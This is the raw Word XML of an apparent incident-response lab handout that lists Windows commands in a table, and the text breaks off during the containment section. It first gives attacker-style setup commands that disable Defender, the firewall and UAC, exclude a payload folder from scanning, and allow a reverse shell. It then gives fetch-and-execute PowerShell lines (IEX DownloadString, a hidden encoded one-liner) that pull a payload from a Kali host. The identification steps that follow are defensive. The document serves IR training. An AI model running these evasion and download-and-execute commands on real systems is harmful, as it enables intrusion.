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826D7" w14:paraId="10496E48" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="050F1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89DC7F6" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="120" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="008CBB"/>
              </w:rPr>
              <w:t>DEPI PROJECT</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="280CD88C" w14:textId="77777777" w:rsidR="003826D7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Incident Response — Windows Commands Reference</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FDC44D6" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="160"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="80A8C8"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Full command table: PowerShell vs </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="80A8C8"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CMD  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="80A8C8"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Prerequisites for each command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C187DE5" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7"/>
    <w:p w14:paraId="02A2ADCF" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LEGEND:   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="00519A"/>
        </w:rPr>
        <w:t xml:space="preserve">  PS  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = PowerShell (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="444444"/>
        </w:rPr>
        <w:t xml:space="preserve">  CMD  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Command Prompt (</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Admin)   </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="B85C00"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  ⚠  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = Requires extra setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F29C2A" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7"/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826D7" w14:paraId="647E90A9" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="0D4F6B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75DD96B" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 1 — Lab Preparation</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266AA667" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Run FIRST on Windows 10 (before any attack). All commands are inside windows_lab_prep.bat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="66809C07" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="53FC2E0B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="4CAF50"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="4CAF50"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="4CAF50"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="4CAF5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EEA350" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="007A3D"/>
              </w:rPr>
              <w:t xml:space="preserve">✔  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="004020"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>All</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="004020"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> commands in this section are automated inside windows_lab_prep.bat — just Right-click → Run as Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0C7F511D" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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8"/>
        <w:gridCol w:w="7348"/>
        <w:gridCol w:w="787"/>
        <w:gridCol w:w="1305"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="39851611" w14:textId="77777777"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68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7558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68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601A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68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829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Where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68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96BA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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6AFD0FD8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625E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81F9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sc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stop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WinDefend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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EE6B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6B38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Stops Defender service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="38F5F82C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BCC5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893D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sc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config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WinDefend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start= disabled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C16E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4B63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Prevents Defender from auto-starting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="2C5BFD06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765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D6F3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Set-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MpPreference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-DisableRealtimeMonitoring $true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FEF9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5000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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5B923D18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8DAB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C5B0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Set-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MpPreference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DisableBehaviorMonitoring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$true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F8B6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16B0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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="094E4A99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B5C9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A15B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Set-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MpPreference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DisableIOAVProtection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$true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08E3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A45D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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="74F3BFE4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75A6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1F46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Set-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MpPreference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DisableScriptScanning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$true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7C39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6E99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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="2600921B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85A3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A923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Set-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MpPreference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MAPSReporting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Disabled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8546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94EF" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stops</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> sending data to Microsoft</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6011B2EA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E441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lastRenderedPageBreak/>
              <w:t>8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98A3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Set-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MpPreference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SubmitSamplesConsent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NeverSend</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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64FB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BAC4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—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="1ACADA51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A050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9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E6B7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Add-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MpPreference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ExclusionPath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"C:\Users\Public\Documents"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E986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9ADC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Exclude payload folder from scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="2129E327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1A95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10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B912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Add-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MpPreference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ExclusionExtension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".exe"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B398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8FB6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Exclude .exe files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="114BFB96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252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11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7580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 xml:space="preserve">reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v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DisableAntiSpyware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/t REG_DWORD /d 1 /f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5D35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8C74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Survives reboots</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="1A9F6ED6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5AD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12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EB64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netsh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advfirewall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set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allprofiles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state off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0EA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06C5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Disables all firewall profiles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="3EE60659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D53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13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9824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Set-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NetFirewallProfile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-Profile </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Domain,Public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>,Private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-Enabled False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6BFB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39ED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PowerShell alternative for step 12</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5A47D4E9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689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14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1DAF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Set-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ExecutionPolicy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Unrestricted -Force -Scope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LocalMachine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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783A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FEA6" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>⚠ REQUIRED to run .ps1 scripts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5CDFC17C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D33D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15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8C33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netsh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advfirewall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firewall add rule name="LAB-4444" protocol=TCP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dir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=in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localport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=4444 action=allow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4D7A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3010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Opens port 4444 inbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="37046A58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8C90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16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33F9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netsh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advfirewall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firewall add rule name="LAB-8080" protocol=TCP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dir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=in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localport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=8080 action=allow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B220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20DD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Required for HTTP payload download</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="66029ACB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8451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17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E2CD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netsh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advfirewall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firewall add rule name="LAB-OUT" protocol=TCP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dir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=out action=allow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C85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5A5E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Required for reverse shell outbound</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6D5EA135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4500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18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D004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reg add "HKLM\System\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CurrentControlSet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\Control\Terminal Server" /v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fDenyTSConnections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/t REG_DWORD /d 0 /f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FA14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95D3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Enables RDP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="19FF8109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5B46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D6888"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>19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715B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 xml:space="preserve">reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v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EnableLUA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/t REG_DWORD /d 0 /f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A398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01DE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Disables UAC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A05F282" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="75388BEC" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7B2D0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513566ED" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 2 — Payload Download &amp; Execution</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08BA7C20" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Run on Windows 10 after Kali HTTP server is running</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="155CD4B3" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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4"/>
        <w:gridCol w:w="7342"/>
        <w:gridCol w:w="779"/>
        <w:gridCol w:w="1323"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="5C64D6DA" w14:textId="77777777"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933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8329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#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933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9535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933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FFE0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Where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933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0440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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="4FBD4713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4D9A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993300"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>20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CFB4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Invoke-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WebRequest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-Uri "http://&lt;KALI_IP</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt;:8080/update.ps1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>"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OutFile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"C:\Users\Public\Documents\update.ps1"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2685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BF5E" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>⚠ Kali HTTP server must be running on port 8080</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="6606071A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7A25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993300"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>21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B9E8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(Get-Item "C:\Users\Public\Documents\update.ps1"</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>).Length</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/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B24E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PS </w:t>
            </w:r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1694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Verify file downloaded correctly — check size &gt; 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="0F6433A2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5A66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993300"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>22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A863" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>IEX(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>New-Object Net.WebClient</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>).DownloadString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>('http://&lt;KALI_IP</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>&gt;:8080/update.ps1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>')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B3A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129E" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">⚠ Runs payload directly without saving. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ExecutionPolicy</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:i/>
                <w:color w:val="B85C00"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> must be Unrestricted (Step 14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="1D78AC89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8779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993300"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>23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FA96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powershell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NoP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NonI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-W Hidden -Exec Bypass -Enc &lt;BASE64&gt;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06DC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PS </w:t>
            </w:r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12DE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One-liner — Kali script generates the full command automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="397FCE19" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="27AD95D3" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8B000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7712761C" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 3 — Phase 1: Identification</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4A18FE" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Run AFTER the reverse shell is </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>active  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Steps 1 – 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4959996B" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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12"/>
        <w:gridCol w:w="4819"/>
        <w:gridCol w:w="1247"/>
        <w:gridCol w:w="2551"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="1B4553C0" w14:textId="77777777" w:rsidTr="00603072">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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A11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6894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A11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ACEA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A11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5ADC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Where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A11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7932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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="0CB28083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A565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AA1122"/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F9D2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netstat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ano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|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findstr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"4444"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B6D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4AB9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Note the PID from the last column — you'll need it in all next steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="0BCD1DCE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EB3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AA1122"/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9892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wmic process where (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ParentProcessId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=&lt;PID&gt;) get Name,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ProcessId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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D3DD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68F4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Replace &lt;PID&gt; with value found in Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="1796DB4C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250B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AA1122"/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F0F0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tasklist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/fi "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pid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eq &lt;pid1&gt;"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073E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D07B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Replace &lt;pid1&gt; with suspicious PID from Step 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="43A60065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D320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AA1122"/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286C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 xml:space="preserve">wmic process where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processid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=&lt;pid1&gt; get </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>name,executablepath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>,commandline</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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A11B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7BE5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Gets full path of the malicious process</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="40ED1FBD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6504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AA1122"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5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20D8" w14:textId="31E7BDB9" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Get-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CimInstance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Win32_Process | Select-Object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ProcessId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ParentProcessId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, Name | Where-Object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ProcessId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-in &lt;pid1&gt;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E8DE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63CB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Shows parent-child process injection chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63E769F4" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7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826D7" w14:paraId="0B3F3A19" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9638" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="8B450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FD89CBE" w14:textId="77777777" w:rsidR="003826D7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8"/>
              </w:rPr>
              <w:t>SECTION 4 — Phase 2: Containment</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7401FC76" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Isolate the machine and preserve </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>evidence  |</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="CCE8FF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">  Steps 5 – 7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="13A4950C" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="003826D7">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="11610" w:type="dxa"/>
        <w:tblInd w:w="-870" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="6110"/>
        <w:gridCol w:w="808"/>
        <w:gridCol w:w="4062"/>
      </w:tblGrid>
      <w:tr w:rsidR="003826D7" w14:paraId="7E1730CE" w14:textId="77777777" w:rsidTr="00E22026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6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C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972C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w="6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C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3419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w="8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C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7701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Where</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="40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C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259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Prerequisites</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="3646341E" w14:textId="77777777" w:rsidTr="00E22026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630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4C31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CC6600"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6110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94B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Disable-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NetAdapter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-Name "*" -</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="1A507E"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Confirm:$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>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="80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25C0" w14:textId="2F88AFD0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PS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="005A9E"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="406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18FC" w14:textId="77777777" w:rsidR="003826D7" w:rsidRDefault="00000000">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cuts</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="444444"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> ALL network immediately — you will lose RDP access if using it remotely</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003826D7" w14:paraId="5E1BAB32" w14:textId="77777777" w:rsidTr="00E22026">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630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420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CC6600"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
